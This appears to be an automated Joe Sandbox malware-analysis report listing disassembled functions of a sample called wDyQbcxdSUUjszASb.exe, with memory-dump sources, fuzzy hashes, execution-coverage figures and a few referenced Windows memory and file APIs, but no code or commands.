Instruction Fuzzy Hash: 18F09021E0D61E4AEA78E798C5646B86393BB54310F1241B9D84ED31F2CD687E918A54

Function 00007FFD9BADB769 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10c1683413c9c5c137166bf462a001f4fe677ed0b3cdbf0ebfb22b86a7c0befb
Instruction ID: cd5f95026572c9b83b59b553a2e25c1a317590c5288e407f2bbb6897b0938065
Opcode Fuzzy Hash: 10c1683413c9c5c137166bf462a001f4fe677ed0b3cdbf0ebfb22b86a7c0befb
Instruction Fuzzy Hash: E8F0E52170D7C80FC72A966958A50617FF1CB6B10134A02FFD186C72A3ED58EC858341

Function 00007FFD9BAD8745 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d95123e579a440c09267f5e2a9d733e729c7539cdd2988ee51ea452457f2a52c
Instruction ID: 6f830e85b1af1a73c909799fa911e7aab07be29d21faaa72e7a8f893d45d875f
Opcode Fuzzy Hash: d95123e579a440c09267f5e2a9d733e729c7539cdd2988ee51ea452457f2a52c
Instruction Fuzzy Hash: 5BE02B21B0EA495FD31D1B7848348647BA0FFAA36675B06B6C009CB1F2DD55ED098311

Function 00007FFD9BAD36F9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89c7584d9db65477b25dd41cbc8bfbfa943de94b837edbe973393c89112b9969
Instruction ID: 3ea180dbb48fb7d522db4f70aebaa8c32ba3768182ad8321915c212f06d169cd
Opcode Fuzzy Hash: 89c7584d9db65477b25dd41cbc8bfbfa943de94b837edbe973393c89112b9969
Instruction Fuzzy Hash: 13E09230709B884FC70E963888685507BF1EB6721138A02DBC045CB2A3E929DCC9C741

Function 00007FFD9BAC8809 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac3000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5f5dc9ae62294e18a5bb9d7e189b577b13f7d502a9111be01e9c3b7739b8716
Instruction ID: 22a58bc38ce7ef3f94ceedfd0f2477d10b7446c9fded8b5f1a3a3b19bfa0ef2c
Opcode Fuzzy Hash: d5f5dc9ae62294e18a5bb9d7e189b577b13f7d502a9111be01e9c3b7739b8716
Instruction Fuzzy Hash: 34F0A021A0F7C50FD72653B808791743FA1AF63260B4A02FBD088CB5E3DA8D4806C301

Function 00007FFD9BADB2F9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57f8df79b90ad6b47574e629a3ac2ef7326039ebed619a650733b31ae25255c6
Instruction ID: e848b00d944430da3064828c4b47faee708c3c800662ff8c8d1a184a5dcee5fd
Opcode Fuzzy Hash: 57f8df79b90ad6b47574e629a3ac2ef7326039ebed619a650733b31ae25255c6
Instruction Fuzzy Hash: AAE06D6160E3C44FC71AAA3488688547F60EE6B21134A42EFC045CF2A7EA2DC889C701

Function 00007FFD9BADB229 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97fb6f58e9e18b6a13b33444034f3686c296786dc6184530b20c2c04fc258674
Instruction ID: 1742eede10340405fe05d1ae4431fce0c29476c851ffbafc45f31da6c0eea2b1
Opcode Fuzzy Hash: 97fb6f58e9e18b6a13b33444034f3686c296786dc6184530b20c2c04fc258674
Instruction Fuzzy Hash: E6E0927160E3C44FC71AEB7488688547F60EF6B20134A42EFC045CF2A7EA2DC889C701

Function 00007FFD9BADE7B9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59a1f38a9e7c03f2f71eacf965239da2a98e92fb7ef20bff5ea6dfe90c7d8d6f
Instruction ID: b867586b97cebf1b549cbf129bffa547061516cb0ec1c9aa6da9154a5fd83259
Opcode Fuzzy Hash: 59a1f38a9e7c03f2f71eacf965239da2a98e92fb7ef20bff5ea6dfe90c7d8d6f
Instruction Fuzzy Hash: 97E08C21A4A7840FC30E56348CA98903FB0DF6B21278B00EBD041CF2B3E62DCC89C712

Function 00007FFD9BAD1DD4 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81e04ff7cbd5af4983405507494454b48c2a03704156e97ebbfa7375b5ccac1b
Instruction ID: c9b05cf43b32ca9c8351993ac4ff3b78cceee65bd9d59ca1da76ea2719ec1ee4
Opcode Fuzzy Hash: 81e04ff7cbd5af4983405507494454b48c2a03704156e97ebbfa7375b5ccac1b
Instruction Fuzzy Hash: 36E0653160960E8BE725EB51D8A4BF572929B94310F518639C01E862D6EEBDA9858B40

Function 00007FFD9BAB3C99 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bab0000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa50d5cee0661be08a9ec4a049920b77e22b50ee52b520487854b3e586be27bd
Instruction ID: fcf96635b8c76e24915d295d0ebc3b9d52cd7a22a61bab642b31dc87d26aec1a
Opcode Fuzzy Hash: aa50d5cee0661be08a9ec4a049920b77e22b50ee52b520487854b3e586be27bd
Instruction Fuzzy Hash: CCE01AB154E3D48FCB56EB7488799543FA0AE6B21078B41EEC089CF1B3E62D9849C701

Function 00007FFD9BAD2150 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f5d4b054044aec10af88b3949b5b762d3a083813bd828b0a54bbbdd8d0a577e
Instruction ID: 536789de4313924475052485bdfd6656e8101431cea91e73d88a631c0209d82c
Opcode Fuzzy Hash: 1f5d4b054044aec10af88b3949b5b762d3a083813bd828b0a54bbbdd8d0a577e
Instruction Fuzzy Hash: ECD05E30B60A4D4B8B0CA62D8458434B3D1E7AA206794527C940BC2295ED25ECC6CB80

Function 00007FFD9BADB7F9 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed1b61546f24a85cd3b5babeb7538fd47f39e6dd588af3c75ae55525d04f6b93
Instruction ID: 29a9a90989bdcc1e94da277daf0bed071e270f7cf4082f9f927f1273897e0108
Opcode Fuzzy Hash: ed1b61546f24a85cd3b5babeb7538fd47f39e6dd588af3c75ae55525d04f6b93
Instruction Fuzzy Hash: 92E01A6154E3C44FCB06AB7488A58543FA09E6B21178B40EEC145CF1B3E62D8849C711

Function 00007FFD9BADB310 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BADB240 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BAD86F9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beca9b426dadecf8e74a1b63585154a03596f4ac1a4767df2bf5dbbeb0cd27c7
Instruction ID: 42d9a0983d15a34a7d1283036875c9cc1e9b7c2bf9204a3add4aa88b2057fdbc
Opcode Fuzzy Hash: beca9b426dadecf8e74a1b63585154a03596f4ac1a4767df2bf5dbbeb0cd27c7
Instruction Fuzzy Hash: ABE04F2154E7C04FC70B973488788903F61DE6721034A41EEC185CF2B3E92D8C49C711

Function 00007FFD9BADE739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 335377fe2aa44177275ee3d6036c95e6e6b1d66af03c60f3567608b0a3d7cc55
Instruction ID: 1172b54a9b4268a6b248ee670b2ae8f9a04df7cd1b8757f91ffadb23cb0fcb74
Opcode Fuzzy Hash: 335377fe2aa44177275ee3d6036c95e6e6b1d66af03c60f3567608b0a3d7cc55
Instruction Fuzzy Hash: E0E0B66294F7C44FC74B9B3588B88947F60DE6B21178A41EBC185CF6B3EA298D49C712

Function 00007FFD9BAC8820 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac3000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4d4861f9304e0fa2187f507a56a364a5a9f61ee0b8b04a19e61bcfbc85e6faf
Instruction ID: 25aec9f410920aac18ffa7bfd3b825bf48ad5cea229c39b7dbbf04798281e24d
Opcode Fuzzy Hash: f4d4861f9304e0fa2187f507a56a364a5a9f61ee0b8b04a19e61bcfbc85e6faf
Instruction Fuzzy Hash: F0D02B01F1E94E15EB34B2BC28A63742BC2D392270F890178E048C26C5DCCD04518342

Function 00007FFD9BAD49C0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9BAD28E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9BAB429F Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bab0000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09e3f907191c9af5c3d9c7b154bb890f07c3607aecab37c5b90d4091d4549b5
Instruction ID: 9de240155e32f1003c647f9413beceac108bcaa0f8fb0f1bf34c289b5452f3e9
Opcode Fuzzy Hash: b09e3f907191c9af5c3d9c7b154bb890f07c3607aecab37c5b90d4091d4549b5
Instruction Fuzzy Hash: 27E086B1F0490D4AFB64DB48C861ABD6BB1DF54314F01013BD02A861D6CE6414434B80

Function 00007FFD9BADC588 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e29a2fe25c48b18fb81fd325854f065f83bea9e5cfd9c6e5fa4c1d756930c93
Instruction ID: 733ea559ec0350303d3a59bda227a3f9b4c7746b7e0b9f3c2a42d714da7aa763
Opcode Fuzzy Hash: 9e29a2fe25c48b18fb81fd325854f065f83bea9e5cfd9c6e5fa4c1d756930c93
Instruction Fuzzy Hash: 67D02230B508040FCB0CA73888588303390EBAA20278200A8D00AC72B1D96ADC88C780

Function 00007FFD9BAD7CC0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
Instruction ID: 74416d7a16f95c13eea6e178074c7a4fb096be8d470c0d4dc9de835bd2cebf33
Opcode Fuzzy Hash: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
Instruction Fuzzy Hash: 28D02230B508040FC70CAB3888588303390EBAA21278100A8E00AC72B1E96ADC88C740

Function 00007FFD9BAB4A07 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bab0000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caafc75bccc4d626e9344b6f4828711c605ff35942b0ce6db9da6086e27619d0
Instruction ID: 4f8b20deb2854e245df8e055c43de6ec7e45564fa6bdebc49b1f22f06621502d
Opcode Fuzzy Hash: caafc75bccc4d626e9344b6f4828711c605ff35942b0ce6db9da6086e27619d0
Instruction Fuzzy Hash: 53D05E24B0D86F4BE675ABC894B127E6291EF54300F120079D42EC31F7DD68EA42CA41

Function 00007FFD9BAD09D8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0985b453041a5057ec0d1e209ae610ff9f0a53537ccc1802e6dbe23e8723734
Instruction ID: 5a86ca24a407064001addaa92a914d191d8f38c8a24f17c8c3d54192815f4df1
Opcode Fuzzy Hash: e0985b453041a5057ec0d1e209ae610ff9f0a53537ccc1802e6dbe23e8723734
Instruction Fuzzy Hash: 88C022A040B2801FEB1023B5882E828BE80EE0213034940FDC00A8B073E04C0C008300

Analysis Process: wDyQbcxdSUUjszASb.exePID: 3696, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	88.2%
Signature Coverage:	0%
Total number of Nodes:	17
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9BA90D4C Relevance: 1.5, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5\_H, xrefs: 00007FFD9BA90DF3

Memory Dump Source

Source File: 0000001D.00000002.2965419537.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9ba90000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID: 5\_H
API String ID: 0-3325266018
Opcode ID: ba6197da0d84491c8d09cab412b000d9dc1e4b2ecde541a5355c2fb117b326ee
Instruction ID: a9cbc431cc5258b62a98abd88d53ed9fdb33ac90c078b092a44d304f49eeae5d
Opcode Fuzzy Hash: ba6197da0d84491c8d09cab412b000d9dc1e4b2ecde541a5355c2fb117b326ee
Instruction Fuzzy Hash: 6891F271A09A8D8FE799DB6888757A97FF1FF5A754F4001AAD049D73E6CBB82410C700

Function 00007FFD9BE823FF Relevance: .7, Instructions: 731COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2974113641.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9be80000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de2d8c74f71c955ea3c9328012fbf23256a49eb08d72d8e12dab6c8f53cf607a
Instruction ID: 31cb06ee7cd4937a7b70c2f3c587be5a6c0a1856a6f785863744ab3b069791f9
Opcode Fuzzy Hash: de2d8c74f71c955ea3c9328012fbf23256a49eb08d72d8e12dab6c8f53cf607a
Instruction Fuzzy Hash: 9B52C430A19E598FDB6DDF98C4A46B877A1FF49300F1041BDD46ECB296CB39A981CB41

Function 00007FFD9BFA000A Relevance: .6, Instructions: 613COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2977782528.00007FFD9BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9bfa0000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88c0a80b9eff60eda94749b55a63e329b7ddb09cea4614b904251d95b3f7d5bc
Instruction ID: fd5dc31d65fbe53bab6ef3f93539ec6725de32b7516b0629650e86dbee054237
Opcode Fuzzy Hash: 88c0a80b9eff60eda94749b55a63e329b7ddb09cea4614b904251d95b3f7d5bc
Instruction Fuzzy Hash: 9412D431B19B4D4FEB68EF6884656B937E1FF98710F05027AE44DC32A2DE39A9418741

Function 00007FFD9BA90E43 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2965419537.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9ba90000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df97c34d38efae6d94d2a2cb2cda82a4289fe50b95c25394b9c5dbab972806f7
Instruction ID: bb61c822e188e4ec34cf0d0f7b7c99503f951a2f08f53b2abe2f45bca230cd9d
Opcode Fuzzy Hash: df97c34d38efae6d94d2a2cb2cda82a4289fe50b95c25394b9c5dbab972806f7
Instruction Fuzzy Hash: 1351B172A0895D8FE7A8DB5C9865BA97BE0EF9A728F50017EE009D73D6CBB81411C700

Function 00007FFD9BAD4A52 Relevance: 1.6, APIs: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FFD9BAD83D9

Memory Dump Source

Source File: 0000001D.00000002.2965419537.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9babe000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: 2ae846d5ea85a9eb26559439c034af2127e203310749984a6fe27ebab97306b2
Instruction ID: 1e65c9d7a89a3df0c9ba5c98e5ef5938204b1329097e22c743eb4e1ba470dc6a
Opcode Fuzzy Hash: 2ae846d5ea85a9eb26559439c034af2127e203310749984a6fe27ebab97306b2
Instruction Fuzzy Hash: E241507191CA5C8FDB58EF4CD845AA97BE0FBA9721F10426EE44DE3251CB70A845CBC1

Function 00007FFD9BA9B32A Relevance: 1.6, APIs: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 00007FFD9BA9B40D

Memory Dump Source

Source File: 0000001D.00000002.2965419537.00007FFD9BA97000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA97000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9ba97000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: edb359786ea9e808f8261bf8134f93e0a2888e1e13d301fa4aa5a0b7162c5079
Instruction ID: 254f4b612b5ff62c31cb3d88ca0d09089da905108028872c4079824a28ee2b0d
Opcode Fuzzy Hash: edb359786ea9e808f8261bf8134f93e0a2888e1e13d301fa4aa5a0b7162c5079
Instruction Fuzzy Hash: 9041193190D7884FDB19DBA89C166E97FE0EF56321F0443AFD089D32A2CE746806C792

Function 00007FFD9BA9C211 Relevance: 1.5, APIs: 1, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001D.00000002.2965419537.00007FFD9BA97000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA97000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9ba97000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c7166b651aa53a3393a0a37a6ae48d4258f5d880bae13e3532610ed8be7c28c
Instruction ID: cdcca504b5ef82df2b7955bc83940a73f3417b9a4b26fb2b11e77ac362f2626c
Opcode Fuzzy Hash: 2c7166b651aa53a3393a0a37a6ae48d4258f5d880bae13e3532610ed8be7c28c
Instruction Fuzzy Hash: 67510C31B1DA4C0FE758F76C98566B977E1EB99325F0441BEE04DC32D3DE68A8428781

Function 00007FFD9BE871D8 Relevance: 1.4, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFD9BE87252

Memory Dump Source

Source File: 0000001D.00000002.2974113641.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9be80000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 32b7846a71e110d76ea437d313682f950abf7a1f7ba3c8340f7ac1824eca5aab
Instruction ID: 12ff4869048897dbaf10372542e5f5a24c1020a66a548662db75599baa8d6aeb
Opcode Fuzzy Hash: 32b7846a71e110d76ea437d313682f950abf7a1f7ba3c8340f7ac1824eca5aab
Instruction Fuzzy Hash: 4F516E71F09A4E9FDB59CBA8C4615FCB7B1EF58300F1141BAD02AE72A2CA352A05CB45

Function 00007FFD9BE82188 Relevance: 1.4, Strings: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFD9BE82202

Memory Dump Source

Source File: 0000001D.00000002.2974113641.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9be80000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c9e244b7cd6b4dbe78b3d802d5352aab14ccc48974e89738219b662c30011314
Instruction ID: 83a88d1ff143dd6dc474c10110600039fe7fe0e7c6624064115b11adab05251f
Opcode Fuzzy Hash: c9e244b7cd6b4dbe78b3d802d5352aab14ccc48974e89738219b662c30011314
Instruction Fuzzy Hash: F4516F71E0994E8FDB59DBD8C8655BCB7B1FF58300F1141BED02AEB2A6CA352A01CB50

Function 00007FFD9BA9C301 Relevance: 1.4, APIs: 1, Instructions: 126
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FFD9BA9C3B4

Memory Dump Source

Source File: 0000001D.00000002.2965419537.00007FFD9BA97000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA97000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9ba97000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d806db3b30493475976c252a37a46ea8fea300506f213cacbc5e741a2080f503
Instruction ID: 8ba27baedf036518f6044013805f2555c27c66482182f685ff15238756cc2046
Opcode Fuzzy Hash: d806db3b30493475976c252a37a46ea8fea300506f213cacbc5e741a2080f503
Instruction Fuzzy Hash: 9B312C31A0CB4C4FDB1DAB6898166FABBF0EF56321F04426FE04AC3153DA646916C7C1

